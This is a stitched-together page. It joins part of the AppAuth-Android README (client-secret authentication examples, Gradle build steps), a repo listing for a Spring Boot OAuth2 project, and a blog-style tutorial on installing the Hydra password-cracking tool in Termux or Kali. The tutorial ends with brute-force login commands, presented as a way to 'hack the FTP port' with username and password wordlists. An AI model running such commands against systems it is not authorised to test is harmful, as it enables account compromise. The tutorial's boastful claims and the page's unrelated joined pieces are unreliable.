Having said this, in some cases using client secrets is unavoidable. In these cases, a [ClientAuthentication](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/ClientAuthentication.java) instance can be provided to AppAuth when performing a token request. This allows additional parameters (both HTTP headers and request body parameters) to be added to token requests. Two standard implementations of ClientAuthentication are provided:

- [ClientSecretBasic](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/ClientSecretBasic.java): includes a client ID and client secret as an HTTP Basic Authorization header.
- [ClientSecretPost](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/ClientSecretPost.java): includes a client ID and client secret as additional request parameters.

So, in order to send a token request using HTTP basic authorization, one would write:

```java
ClientAuthentication clientAuth = new ClientSecretBasic(MY_CLIENT_SECRET);
TokenRequest req = ...;
authService.performTokenRequest(req, clientAuth, callback);
```

This can also be done when using `performActionWithFreshTokens` on AuthState:

```java
ClientAuthentication clientAuth = new ClientSecretPost(MY_CLIENT_SECRET);
authState.performActionWithFreshTokens(
    authService,
    clientAuth,
    action);
```

## Modifying or contributing to AppAuth

This project requires the Android SDK for API level 25 (Nougat) to build, though the produced binaries only require API level 16 (Jellybean) to be used. We recommend that you fork and/or clone this repository to make modifications; downloading the source has been known to cause some developers problems.

For contributors, see the additional instructions in [CONTRIBUTING.md](https://github.com/openid/AppAuth-Android/blob/master/CONTRIBUTING.md).

### Building from the Command line

AppAuth for Android uses Gradle as its build system.
In order to build the library and app binaries, run `./gradlew assemble`. The library AAR files are output to `library/build/outputs/aar`, while the demo app is output to `app/build/outputs/apk`. In order to run the tests and code analysis, run `./gradlew check`.

### Building from Android Studio

In Android Studio, File -> New -> Import project. Select the root folder (the one with the `build.gradle` file).

JavaChinna / Spring Boot Oauth2

Spring boot User Registration and OAuth2 Social login with Facebook, Google, LinkedIn and Github

VEDARSH05 / Hydra

how to install hydra

Hi guys if you are searching for how to install hydra and searching for the best article to get the best explanation about how to install hydra. Then you are in the right place. Today I'm here going to share the step by step tutorial about "how to install hydra". Through this article, you can get a lot of about how to install hydra and use in termux, how to install hydra in termux, how to install hydra on kali linux. And I'm damn sure that you will never get all this unique information like us on the internet anywhere else.

What is Hydra Tool?

Thc-hydra, In short, we can call it hydra, This tool is used for penetration testing and cracking the open ports and web login pages like FTP login pages, HTTP login pages, and many more pages. This tool is purely made to make the cracking process more efficient with the best results. So this tool is available for only some limited devices like Linux, Debian based but today will discuss how to install the hydra tool on any device without any errors or issues, Like termux and other terminal emulator apps.

How to Install Hydra?

To Install hydra there are some must requirements which you need to follow.

REQUIREMENTS (Termux/Kali)

> 1 GB of data storage
> 50 MB internet data
> 3 GB of ram for better performance
> Android with 5.0.0 and higher
> Rooted device

I hope, you had followed all the requirements properly.

1. Install Termux app from F-droid app, and update & upgrade it.

```bash
apt-get update
apt-get upgrade
```

2. After updating Termux, Install basic packages like python, curl, wget, php, etc.

```bash
apt install -y python php curl wget git nano
```

3. Now open the Termux home directory.

```bash
cd $HOME
```

4. Git clone the hydra link in termux/kali.

```bash
git clone https://github.com/vanhauser-thc/thc-hydra
```

5. Now open the cloned hydra repository in your terminal.

```bash
cd $HOME/thc-hydra
```

6. Install some packages by executing the config script.

```bash
./configure
make
make install
```

7. All ready to go, Hydra tool usage help command.

```bash
./hydra -h
```

8. It's time for a little practical demonstration, So suppose you want to hack the FTP port then we can try this command.

```bash
./hydra -l admin -p password ftp://localhost/
```

9. For more info you can check these commands, In which you get a proper idea about how you can use -p And -P commands according to your needs, That's all.

```bash
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/
```